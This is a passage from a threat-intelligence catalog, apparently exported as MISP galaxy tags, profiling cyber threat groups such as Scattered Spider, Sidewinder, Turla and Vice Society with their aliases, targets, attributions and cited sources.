<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:groups="Muddled Libra - Associated Group"

Scattered Spider

[Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) is a cybercriminal group that has been active since at least 2022 targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.<sup>[[CrowdStrike Scattered Spider Profile](https://app.tidalcyber.com/references/a865a984-7f7b-5f82-ac4a-6fac79a2a753)]</sup><sup>[[CrowdStrike Scattered Spider BYOVD January 2023](https://app.tidalcyber.com/references/d7d86f5d-1f02-54b0-b6f4-879878563245)]</sup><sup>[[Crowdstrike TELCO BPO Campaign December 2022](https://app.tidalcyber.com/references/382785e1-4ef3-506e-b74f-cd07df9ae46e)]</sup>

The tag is: misp-galaxy:groups="Scattered Spider"

SideCopy

[SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghan government personnel, since at least 2019. [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594)'s name comes from its infection chain, which tries to mimic that of [Sidewinder](https://app.tidalcyber.com/groups/44f8bd4e-a357-4a76-b031-b7455a305ef0), a suspected Indian threat group.<sup>[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]</sup>

The tag is: misp-galaxy:groups="SideCopy"

T-APT-04 - Associated Group

<sup>[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]</sup>

The tag is: misp-galaxy:groups="T-APT-04 - Associated Group"

Rattlesnake - Associated Group

<sup>[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]</sup>

The tag is: misp-galaxy:groups="Rattlesnake - Associated Group"

Sidewinder

[Sidewinder](https://app.tidalcyber.com/groups/44f8bd4e-a357-4a76-b031-b7455a305ef0) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.<sup>[[ATT Sidewinder January 2021](https://app.tidalcyber.com/references/d6644f88-d727-4f62-897a-bfa18f86380d)]</sup><sup>[[Securelist APT Trends April 2018](https://app.tidalcyber.com/references/587f5195-e696-4a3c-8c85-90b9c002cd11)]</sup><sup>[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]</sup>

The tag is: misp-galaxy:groups="Sidewinder"

Whisper Spider - Associated Group

The tag is: misp-galaxy:groups="Whisper Spider - Associated Group"

Silence

[Silence](https://app.tidalcyber.com/groups/b534349f-55a4-41b8-9623-6707765c3c50) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank’s Automated Workstation Client, ATMs, and card processing.<sup>[[Cyber Forensicator Silence Jan 2019](https://app.tidalcyber.com/references/c328d6d3-5e8b-45a6-8487-eecd7e8cbf7e)]</sup><sup>[[SecureList Silence Nov 2017](https://app.tidalcyber.com/references/004a8877-7e57-48ad-a6ce-b9ad8577cc68)]</sup>

The tag is: misp-galaxy:groups="Silence"

TA407 - Associated Group

<sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup><sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup>

The tag is: misp-galaxy:groups="TA407 - Associated Group"

COBALT DICKENS - Associated Group

<sup>[[Secureworks COBALT DICKENS August 2018](https://app.tidalcyber.com/references/addbb46b-b2b5-4844-b4be-f6294cf51caa)]</sup><sup>[[Secureworks COBALT DICKENS September 2019](https://app.tidalcyber.com/references/45815e4d-d678-4823-8315-583893e263e6)]</sup><sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup><sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup>

The tag is: misp-galaxy:groups="COBALT DICKENS - Associated Group"

Silent Librarian

[Silent Librarian](https://app.tidalcyber.com/groups/0e7bd4da-7974-49c9-b213-116bd7157761) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://app.tidalcyber.com/groups/0e7bd4da-7974-49c9-b213-116bd7157761) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).<sup>[[DOJ Iran Indictments March 2018](https://app.tidalcyber.com/references/7dfdccd5-d035-4678-89c1-f5f1630d7a79)]</sup><sup>[[Phish Labs Silent Librarian](https://app.tidalcyber.com/references/d79d0510-4d49-464d-8074-daedd186f1c1)]</sup><sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup>

The tag is: misp-galaxy:groups="Silent Librarian"

SilverTerrier

[SilverTerrier](https://app.tidalcyber.com/groups/e47ae2a7-d34d-4528-ba67-c9c07daa91ba) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://app.tidalcyber.com/groups/e47ae2a7-d34d-4528-ba67-c9c07daa91ba) mainly targets organizations in high technology, higher education, and manufacturing.<sup>[[Unit42 SilverTerrier 2018](https://app.tidalcyber.com/references/59630d6e-d034-4788-b418-a72bafefe54e)]</sup><sup>[[Unit42 SilverTerrier 2016](https://app.tidalcyber.com/references/a6ba79ca-7d4a-48d3-aae3-ee766770f83b)]</sup>

The tag is: misp-galaxy:groups="SilverTerrier"

Sowbug

[Sowbug](https://app.tidalcyber.com/groups/6632f07f-7c6b-4d12-8544-82edc6a7a577) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. <sup>[[Symantec Sowbug Nov 2017](https://app.tidalcyber.com/references/14f49074-fc46-45d3-bf7e-30c896c39c07)]</sup>

The tag is: misp-galaxy:groups="Sowbug"

Star Blizzard

Star Blizzard is believed to be a Russia-based cyber threat actor group. According to joint Cybersecurity Advisory AA23-341A (December 2023), U.S. and international authorities assess that Star Blizzard is “almost certainly” a subordinate of the Russian Federal Security Service (FSB) Centre 18. Star Blizzard is known to successfully use spear-phishing attacks against its targets for information-gathering purposes. The advisory indicated that authorities observed these spear-phishing attacks occurring through 2023. Star Blizzard has traditionally targeted academic, defense, government, non-governmental (NGO), and think tank organizations (and associated personnel) in the United States and United Kingdom, other NATO nations, and countries neighboring Russia. Politicians have also been targeted. According to the advisory, beginning in 2022, authorities observed Star Blizzard expand its targeting to the defense-industrial sector and U.S. Department of Energy facilities.<sup>[[U.S. CISA Star Blizzard December 2023](/references/3d53c154-8ced-4dbe-ab4e-db3bc15bfe4b)]</sup>

The tag is: misp-galaxy:groups="Star Blizzard"

Stealth Falcon

[Stealth Falcon](https://app.tidalcyber.com/groups/ca3016f3-642a-4ae0-86bc-7258475d6937) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. <sup>[[Citizen Lab Stealth Falcon May 2016](https://app.tidalcyber.com/references/11f46b1e-a141-4d25-bff0-e955251be7f5)]</sup>

The tag is: misp-galaxy:groups="Stealth Falcon"

ProjectSauron - Associated Group

ProjectSauron is used to refer both to the threat group also known as G0041 and to the malware platform also known as S0125. <sup>[[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]</sup> <sup>[[Kaspersky ProjectSauron Full Report](https://app.tidalcyber.com/references/6840c1d6-89dc-4138-99e8-fbd2a45f2a1c)]</sup>

The tag is: misp-galaxy:groups="ProjectSauron - Associated Group"

Strider

[Strider](https://app.tidalcyber.com/groups/deb573c6-071a-4b50-9e92-4aa648d8bdc1) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.<sup>[[Symantec Strider Blog](https://app.tidalcyber.com/references/664eac41-257f-4d4d-aba5-5d2e8e2117a7)]</sup><sup>[[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]</sup>

The tag is: misp-galaxy:groups="Strider"

Suckfly

[Suckfly](https://app.tidalcyber.com/groups/06549082-ff70-43bf-985e-88c695c7113c) is a China-based threat group that has been active since at least 2014. <sup>[[Symantec Suckfly March 2016](https://app.tidalcyber.com/references/8711c175-e405-4cb0-8c86-8aaa471e5573)]</sup>

The tag is: misp-galaxy:groups="Suckfly"

TA2541

[TA2541](https://app.tidalcyber.com/groups/1bfbb1e1-022c-57e9-b70e-711c601640be) is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. [TA2541](https://app.tidalcyber.com/groups/1bfbb1e1-022c-57e9-b70e-711c601640be) campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.<sup>[[Proofpoint TA2541 February 2022](https://app.tidalcyber.com/references/db0b1425-8bd7-51b5-bae3-53c5ccccb8da)]</sup><sup>[[Cisco Operation Layover September 2021](https://app.tidalcyber.com/references/f19b4bd5-99f9-54c0-bffe-cc9c052aea12)]</sup>

The tag is: misp-galaxy:groups="TA2541"

TA459

[TA459](https://app.tidalcyber.com/groups/e343c1f1-458c-467b-bc4a-c1b97b2127e3) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. <sup>[[Proofpoint TA459 April 2017](https://app.tidalcyber.com/references/dabad6df-1e31-4c16-9217-e079f2493b02)]</sup>

The tag is: misp-galaxy:groups="TA459"

Hive0065 - Associated Group

The tag is: misp-galaxy:groups="Hive0065 - Associated Group"

TA505

[TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) is a cyber criminal group that has been active since at least 2014. [TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop.<sup>[[Proofpoint TA505 Sep 2017](https://app.tidalcyber.com/references/c1fff36f-802b-4436-abce-7f2787c148db)]</sup><sup>[[Proofpoint TA505 June 2018](https://app.tidalcyber.com/references/e48dec7b-5635-4ae0-b0db-229660806c06)]</sup><sup>[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]</sup><sup>[[NCC Group TA505](https://app.tidalcyber.com/references/45e0b869-5447-491b-9e8b-fbf63c62f5d6)]</sup><sup>[[Korean FSI TA505 2020](https://app.tidalcyber.com/references/d4e2c109-341c-45b3-9d41-3eb980724524)]</sup>

The tag is: misp-galaxy:groups="TA505"

Shathak - Associated Group

The tag is: misp-galaxy:groups="Shathak - Associated Group"

GOLD CABIN - Associated Group

The tag is: misp-galaxy:groups="GOLD CABIN - Associated Group"

TA551

[TA551](https://app.tidalcyber.com/groups/8951bff3-c444-4374-8a9e-b2115d9125b2) is a financially-motivated threat group that has been active since at least 2018. <sup>[[Secureworks GOLD CABIN](https://app.tidalcyber.com/references/778babec-e7d3-4341-9e33-aab361f2b98a)]</sup> The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. <sup>[[Unit 42 TA551 Jan 2021](https://app.tidalcyber.com/references/8e34bf1e-86ce-4d52-a6fa-037572766e99)]</sup>

The tag is: misp-galaxy:groups="TA551"

TA577

TA577 is a cybercriminal actor that has remained highly active since mid-2020. The actor is known for carrying out email-based campaigns that result in the delivery of a wide range of payloads, including at least one leading to ransomware (REvil) deployment. These campaigns are known to impact organizations in a wide range of sectors and geographic locations.<sup>[[Proofpoint Ransomware Initial Access June 2021](/references/3b0631ae-f589-4b7c-a00a-04dcd5f3a77b)]</sup> The actor appears adept at shifting payloads in response to external factors, for example moving to deliver DarkGate and Pikabot shortly after international authorities disrupted the QakBot botnet in August 2023.<sup>[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]</sup>

The tag is: misp-galaxy:groups="TA577"

TeamTNT

[TeamTNT](https://app.tidalcyber.com/groups/325c11be-e1ee-47db-afa6-44ac5d16f0e7) is a threat group that has primarily targeted cloud and containerized environments. The group has been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.<sup>[[Palo Alto Black-T October 2020](https://app.tidalcyber.com/references/d4351c8e-026d-4660-9344-166481ecf64a)]</sup><sup>[[Lacework TeamTNT May 2021](https://app.tidalcyber.com/references/5908b04b-dbca-4fd8-bacc-141ef15546a1)]</sup><sup>[[Intezer TeamTNT September 2020](https://app.tidalcyber.com/references/1155a45e-86f4-497a-9a03-43b6dcb25202)]</sup><sup>[[Cado Security TeamTNT Worm August 2020](https://app.tidalcyber.com/references/8ccab4fe-155d-44b0-b0f2-941e9f8f87db)]</sup><sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup><sup>[[Trend Micro TeamTNT](https://app.tidalcyber.com/references/d6b52135-6bb2-4e37-8f94-1e1d6354bdfd)]</sup><sup>[[ATT TeamTNT Chimaera September 2020](https://app.tidalcyber.com/references/5d9f402f-4ff4-4993-8685-e5656e2f3aff)]</sup><sup>[[Aqua TeamTNT August 2020](https://app.tidalcyber.com/references/ca10ad0d-1a47-4006-8f76-c2246aee7752)]</sup><sup>[[Intezer TeamTNT Explosion September 2021](https://app.tidalcyber.com/references/e0d6208b-a4d6-45f0-bb3a-6c8681630b55)]</sup>

The tag is: misp-galaxy:groups="TeamTNT"

XENOTIME - Associated Group

The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported by FireEye about TEMP.Veles as well as the actors behind TRITON.<sup>[[Dragos Xenotime 2018](https://app.tidalcyber.com/references/b20fe65f-df43-4a59-af3f-43afafba15ab)]</sup><sup>[[Pylos Xenotime 2019](https://app.tidalcyber.com/references/e2f246d8-c75e-4e0f-bba8-869d82be26da)]</sup><sup>[[FireEye TRITON 2019](https://app.tidalcyber.com/references/49c97b85-ca22-400a-9dc4-6290cc117f04)]</sup><sup>[[FireEye TEMP.Veles 2018](https://app.tidalcyber.com/references/e41151fa-ea11-43ca-9689-c65aae63a8d2)]</sup>

The tag is: misp-galaxy:groups="XENOTIME - Associated Group"

TEMP.Veles

[TEMP.Veles](https://app.tidalcyber.com/groups/3a54b8dc-a231-4db8-96da-1c0c1aa396f6) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://app.tidalcyber.com/software/), a malware framework designed to manipulate industrial safety systems.<sup>[[FireEye TRITON 2019](https://app.tidalcyber.com/references/49c97b85-ca22-400a-9dc4-6290cc117f04)]</sup><sup>[[FireEye TEMP.Veles 2018](https://app.tidalcyber.com/references/e41151fa-ea11-43ca-9689-c65aae63a8d2)]</sup><sup>[[FireEye TEMP.Veles JSON April 2019](https://app.tidalcyber.com/references/491783dc-7a6b-42a6-b923-c4439117e7e4)]</sup>

The tag is: misp-galaxy:groups="TEMP.Veles"

The White Company

[The White Company](https://app.tidalcyber.com/groups/830079fe-9824-405b-93e0-c28592155c49) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.<sup>[[Cylance Shaheen Nov 2018](https://app.tidalcyber.com/references/57802e46-e12c-4230-8d1c-08854a0de06a)]</sup>

The tag is: misp-galaxy:groups="The White Company"

TG-1314 - Associated Group

The tag is: misp-galaxy:groups="TG-1314 - Associated Group"

Threat Group-1314

[Threat Group-1314](https://app.tidalcyber.com/groups/0f86e871-0c6c-4227-ae28-3f3696d6ae9d) is an unattributed threat group that has used compromised credentials to log into a victim’s remote access infrastructure. <sup>[[Dell TG-1314](https://app.tidalcyber.com/references/79fc7568-b6ff-460b-9200-56d7909ed157)]</sup>

The tag is: misp-galaxy:groups="Threat Group-1314"

Earth Smilodon - Associated Group

<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:groups="Earth Smilodon - Associated Group"

TG-3390 - Associated Group

The tag is: misp-galaxy:groups="TG-3390 - Associated Group"

BRONZE UNION - Associated Group

<sup>[[SecureWorks BRONZE UNION June 2017](https://app.tidalcyber.com/references/42adda47-f5d6-4d34-9b3d-3748a782f886)]</sup><sup>[[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)]</sup>

The tag is: misp-galaxy:groups="BRONZE UNION - Associated Group"

Iron Tiger - Associated Group

<sup>[[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]</sup><sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:groups="Iron Tiger - Associated Group"

LuckyMouse - Associated Group

<sup>[[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)]</sup><sup>[[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]</sup><sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:groups="LuckyMouse - Associated Group"

Emissary Panda - Associated Group

The tag is: misp-galaxy:groups="Emissary Panda - Associated Group"

APT27 - Associated Group

<sup>[[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)]</sup><sup>[[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)]</sup><sup>[[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]</sup><sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:groups="APT27 - Associated Group"

Threat Group-3390

[Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) is a Chinese threat group that has extensively used strategic Web compromises to target victims.<sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup> The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.<sup>[[SecureWorks BRONZE UNION June 2017](https://app.tidalcyber.com/references/42adda47-f5d6-4d34-9b3d-3748a782f886)]</sup><sup>[[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)]</sup><sup>[[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]</sup>

The tag is: misp-galaxy:groups="Threat Group-3390"

Thrip

[Thrip](https://app.tidalcyber.com/groups/a3b39b07-0bfa-4c69-9f01-acf7dc6033b4) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. <sup>[[Symantec Thrip June 2018](https://app.tidalcyber.com/references/482a6946-b663-4789-a31f-83fb2132118d)]</sup>

The tag is: misp-galaxy:groups="Thrip"

BRONZE HUNTLEY - Associated Group

The tag is: misp-galaxy:groups="BRONZE HUNTLEY - Associated Group"

Karma Panda - Associated Group

<sup>[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)]</sup><sup>[[CrowdStrike Manufacturing Threat July 2020](https://app.tidalcyber.com/references/5ed6a702-dcc5-4021-95cc-5b720dbd8774)]</sup>

The tag is: misp-galaxy:groups="Karma Panda - Associated Group"

Earth Akhlut - Associated Group

<sup>[[TrendMicro Tonto Team October 2020](https://app.tidalcyber.com/references/140e6b01-6b98-4f82-9455-0c84b3856b86)]</sup>

The tag is: misp-galaxy:groups="Earth Akhlut - Associated Group"

CactusPete - Associated Group

The tag is: misp-galaxy:groups="CactusPete - Associated Group"

Tonto Team

[Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).<sup>[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)]</sup><sup>[[ESET Exchange Mar 2021](https://app.tidalcyber.com/references/c83f1810-22bb-4def-ab2f-3f3d67703f47)]</sup><sup>[[FireEye Chinese Espionage October 2019](https://app.tidalcyber.com/references/d37c069c-7fb8-44e1-8377-da97e8bbcf67)]</sup><sup>[[ARS Technica China Hack SK April 2017](https://app.tidalcyber.com/references/c9c647b6-f4fb-44d6-9376-23c1ae9520b4)]</sup><sup>[[Trend Micro HeartBeat Campaign January 2013](https://app.tidalcyber.com/references/f42a36c2-1ca5-49ff-a7ec-7de90379a6d5)]</sup><sup>[[Talos Bisonal 10 Years March 2020](https://app.tidalcyber.com/references/6844e59b-d393-43df-9978-e3e3cc7b8db6)]</sup>

The tag is: misp-galaxy:groups="Tonto Team"

Mythic Leopard - Associated Group

<sup>[[Crowdstrike Mythic Leopard Profile](https://app.tidalcyber.com/references/efa5dc67-3364-4049-bb13-8b9e1b55f172)]</sup><sup>[[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]</sup><sup>[[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]</sup>

The tag is: misp-galaxy:groups="Mythic Leopard - Associated Group"

COPPER FIELDSTONE - Associated Group

<sup>[[Secureworks COPPER FIELDSTONE Profile](https://app.tidalcyber.com/references/d7f5f154-3638-47c1-8e1e-a30a6504a735)]</sup>

The tag is: misp-galaxy:groups="COPPER FIELDSTONE - Associated Group"

APT36 - Associated Group

<sup>[[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]</sup>

The tag is: misp-galaxy:groups="APT36 - Associated Group"

ProjectM - Associated Group

<sup>[[Unit 42 ProjectM March 2016](https://app.tidalcyber.com/references/adee82e6-a74a-4a91-ab5a-97847b135ca3)]</sup><sup>[[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]</sup>

The tag is: misp-galaxy:groups="ProjectM - Associated Group"

Transparent Tribe

[Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.<sup>[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)]</sup><sup>[[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]</sup><sup>[[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]</sup>

The tag is: misp-galaxy:groups="Transparent Tribe"

KeyBoy - Associated Group

<sup>[[Unit 42 Tropic Trooper Nov 2016](https://app.tidalcyber.com/references/cad84e3d-9506-44f8-bdd9-d090e6ce9b06)]</sup><sup>[[TrendMicro Tropic Trooper Mar 2018](https://app.tidalcyber.com/references/5d69d122-13bc-45c4-95ab-68283a21b699)]</sup>

The tag is: misp-galaxy:groups="KeyBoy - Associated Group"

Pirate Panda - Associated Group

<sup>[[Crowdstrike Pirate Panda April 2020](https://app.tidalcyber.com/references/f71410b4-5f79-439a-ae9e-8965f9bc577f)]</sup>

The tag is: misp-galaxy:groups="Pirate Panda - Associated Group"

Tropic Trooper

[Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.<sup>[[TrendMicro Tropic Trooper Mar 2018](https://app.tidalcyber.com/references/5d69d122-13bc-45c4-95ab-68283a21b699)]</sup><sup>[[Unit 42 Tropic Trooper Nov 2016](https://app.tidalcyber.com/references/cad84e3d-9506-44f8-bdd9-d090e6ce9b06)]</sup><sup>[[TrendMicro Tropic Trooper May 2020](https://app.tidalcyber.com/references/4fbc1df0-f174-4461-817d-0baf6e947ba1)]</sup>

The tag is: misp-galaxy:groups="Tropic Trooper"

Waterbug - Associated Group

Based on similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.<sup>[[Symantec Waterbug](https://app.tidalcyber.com/references/ec02f951-17b8-44cb-945a-e5c313555124)]</sup>

The tag is: misp-galaxy:groups="Waterbug - Associated Group"

WhiteBear - Associated Group

WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.<sup>[[Securelist WhiteBear Aug 2017](https://app.tidalcyber.com/references/44626060-3d9b-480e-b4ea-7dac27878e5e)]</sup><sup>[[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]</sup>

The tag is: misp-galaxy:groups="WhiteBear - Associated Group"

IRON HUNTER - Associated Group

<sup>[[Secureworks IRON HUNTER Profile](https://app.tidalcyber.com/references/af5cb7da-61e0-49dc-8132-c019ce5ea6d3)]</sup>

The tag is: misp-galaxy:groups="IRON HUNTER - Associated Group"

Group 88 - Associated Group

<sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

The tag is: misp-galaxy:groups="Group 88 - Associated Group"

Belugasturgeon - Associated Group

<sup>[[Accenture HyperStack October 2020](https://app.tidalcyber.com/references/680f2a0b-f69d-48bd-93ed-20ee2f79e3f7)]</sup>

The tag is: misp-galaxy:groups="Belugasturgeon - Associated Group"

Snake - Associated Group

The tag is: misp-galaxy:groups="Snake - Associated Group"

Krypton - Associated Group

The tag is: misp-galaxy:groups="Krypton - Associated Group"

Venomous Bear - Associated Group

The tag is: misp-galaxy:groups="Venomous Bear - Associated Group"

Turla

[Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) is a cyber espionage threat group that has been attributed to Russia’s Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos.<sup>[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]</sup><sup>[[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)]</sup><sup>[[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)]</sup><sup>[[ESET Turla Mosquito Jan 2018](https://app.tidalcyber.com/references/cd177c2e-ef22-47be-9926-61e25fd5f33b)]</sup><sup>[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]</sup>

The tag is: misp-galaxy:groups="Turla"

Vice Society

Vice Society is an extortion-focused threat actor group first observed in mid-2021. The group gained notoriety after targeting a considerable number of educational institutions, especially lower education institutions. Although the education sector accounts for a disproportionate amount of the group’s victims, Vice Society has claimed victims in multiple other industries too, including the healthcare, retail, financial, insurance, and public services sectors. The group regularly pressures victims into paying a ransom by threatening to leak data exfiltrated during its intrusions. Vice Society is not known to have developed its own ransomware, instead deploying other existing families, including HELLOKITTY/FIVEHANDS and Zeppelin.<sup>[[U.S. CISA Vice Society September 2022](/references/0a754513-5f20-44a0-8cea-c5d9519106c8)]</sup>

Related Vulnerabilities: CVE-2021-1675<sup>[[Unit 42 Vice Society December 6 2022](/references/6abf7387-0857-4938-b36e-1374a66d4ed8)]</sup>, CVE-2021-34527<sup>[[Unit 42 Vice Society December 6 2022](/references/6abf7387-0857-4938-b36e-1374a66d4ed8)]</sup>

The tag is: misp-galaxy:groups="Vice Society"

